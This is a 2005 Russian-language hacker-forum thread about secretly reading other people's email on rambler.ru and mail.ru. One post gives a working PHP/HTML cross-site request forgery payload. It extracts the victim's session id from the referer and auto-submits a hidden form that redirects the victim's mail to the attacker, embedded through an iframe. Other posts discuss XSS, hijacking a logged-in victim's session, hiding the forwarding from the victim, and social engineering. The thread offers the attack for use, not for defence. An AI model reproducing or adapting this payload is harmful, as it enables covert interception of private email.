чтение почты на mail.ru и rambler.ru

Discussion in 'Уязвимости Mail-сервисов' started by 4e/\, 16 Apr 2005.

  1. 4e/\

    4e/\ New Member

    Joined:
    11 Apr 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Что то раньше катил метод про переадресацию на другой ящик с ящика рамблера щас это походу прикрыли может можно ещё как то сделать так?
    И ещё как на mail.ru переадресацию сделать?
    Всем заранее спасибо.
     
  2. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    на рамблере принцип ослался тотже
     
  3. 4e/\

    4e/\ New Member

    Joined:
    11 Apr 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Майор объясни пожалуйсто что надо залить на сайт какой html код? Чтобы потом через тег img всё сработало напиши код html заранее спасибо.
     
  4. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    PHP:
    <?
    $nomer=strpos("$HTTP_REFERER","Session/")+8;
    $id=substr("$HTTP_REFERER","$nomer",36);
    echo 
    "
    <html><FORM name='forma' ACTION='http://mail.rambler.ru/Session/
    {$id}/Rules.wssp' method='post' enctype='multipart/form-data'>
    <INPUT type='hidden' name='FormCharset' value='windows-1251'>
    <INPUT TYPE='checkbox' NAME='Redirect' VALUE='1' class='box' CHECKED>
    <TEXTAREA style='width:0%;' NAME='RedirectText' ROWS='0' COLS='0'>TVOE_MILO</TEXTAREA>
    <INPUT TYPE='hidden' NAME='RedirKeep' VALUE='1' class='box' CHECKED>
    <INPUT TYPE='hidden' NAME='RedirHuman' VALUE='0' class='box'>
    <INPUT TYPE='hidden' NAME='KeepToAndCc' VALUE='1' class='box' CHECKED>
    <INPUT type='hidden' name='Update' VALUE='1' class='box' CHECKED>
    </form>
    <script LANGUAGE=javascript>
    document.forma.submit();
    </SCRIPT> "
    ;
    ?>
    Вот как-то так :)
    PS причем эту страничку придётся запихнуть в iframe
     
    #4 Майор, 16 Apr 2005
    Last edited: 17 Apr 2005
  5. 4e/\

    4e/\ New Member

    Joined:
    11 Apr 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Майор значит вон тот код там надо своё мыло вписать которое на рамблере потом всё это сохранить в .php потом загрузить на сайт а какое письмо надо писать раньше же <img> работал <iframe src="adres.php"></iframe> или как? Объясни пожалуйсто
     
  6. iSLa4

    iSLa4 New Member

    Joined:
    27 Jan 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    А про майл.ру есть?
     
  7. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    найди там xss и зделай как здесь в примере с mail.ru
    http://antichat.ru/txt/hmail/
     
  8. 4e/\

    4e/\ New Member

    Joined:
    11 Apr 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    А ты уже понял как на рамблер.ру читать?
    Майор а можешь если не трудно видео записать всё делал как ты написал но не выходит нифига. Напиши пожалуйсто видео. На главную выложите как напишите пожалуйсто очень надо.
     
  9. Master Of Decption

    Master Of Decption New Member

    Joined:
    17 Apr 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    4e и Майор
    На mail.ru пересылку можно в фильтра задать.
     
  10. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    да, там подругому малёк id придётся получить, потом посмотрю когда время будет
    тогда жертва не будет получать письма, что окажется подозрительно, конешно можно отсылать жертве копии специальным скриптом, но мне кажется это неоправдано сложновато будет...
     
  11. 4e/\

    4e/\ New Member

    Joined:
    11 Apr 2005
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Майор ок посмотришь напишешь сюда или сделай видео если не трудно.
    А на майл.ру как сделать чтобы переадресация шла с ящика майл на мой ящик а на тот ящик ничего не приходило? Напиши код пожалуйсто
     
  12. Master Of Decption

    Master Of Decption New Member

    Joined:
    17 Apr 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Ты ошибаешься :)
    Там есть галочка оставлять копии в папке такой-то, посмотри настройку фильтра пересылки.
     
  13. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    Master Of Decption
    Точно :)
    PS смотрел меню давно и мельком

    что и xss нашёл :) ?
    там видимо фильтры нормальные поставили и не одна старая xss не работает ...
     
  14. Xeeper

    Xeeper New Member

    Joined:
    6 Mar 2005
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Господа, большая просьба сообщить о действующих способах на сегодняшний день (на Rambler.ru).
    Если паблика не хотите, можно в ПМ. Я не работаю на Rambler ( это можно легко проверить с большой вероятностью), мне просто нужно хотяб поиметь возможность просматривать письма другого ящика (пароль узнавать не обязательно)
     
  15. Xeeper

    Xeeper New Member

    Joined:
    6 Mar 2005
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Мож кто-нить чё-нить ответит ? :d
     
  16. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Xeeper
    если по-простому, ты можешь общаться с человеком в инете, и попросить его проверить свой ящик на рамблере, и ПОКА ОН В ПОЧТЕ быстро воспользоваться его сессией. Подробно расписывать лишний раз нет смысла, тут много было написано
     
  17. Xeeper

    Xeeper New Member

    Joined:
    6 Mar 2005
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Я как раз и имею ввиду те способы о которых тут было много написанно. Работают ли они на сегодняшний день или все дыры уже прикрыты ? и остаётся тока соц.инженерия ?
     
  18. Ar3s

    Ar3s Banned

    Joined:
    4 May 2005
    Messages:
    86
    Likes Received:
    14
    Reputations:
    5
    Наскока я знаю - все прикрыто. Мне вот тоже очень нужно. Пробовал все. МИМО!
     
  19. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    Там и так фильтры нормальные стояли. А которую мы нашли (не помню уже какую точно), тоже теперь не работает?
     
  20. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    558
    Likes Received:
    112
    Reputations:
    146
    проблема в том что тама все xss прекрыли, атребут src во всех тегах фильтруется очень чётко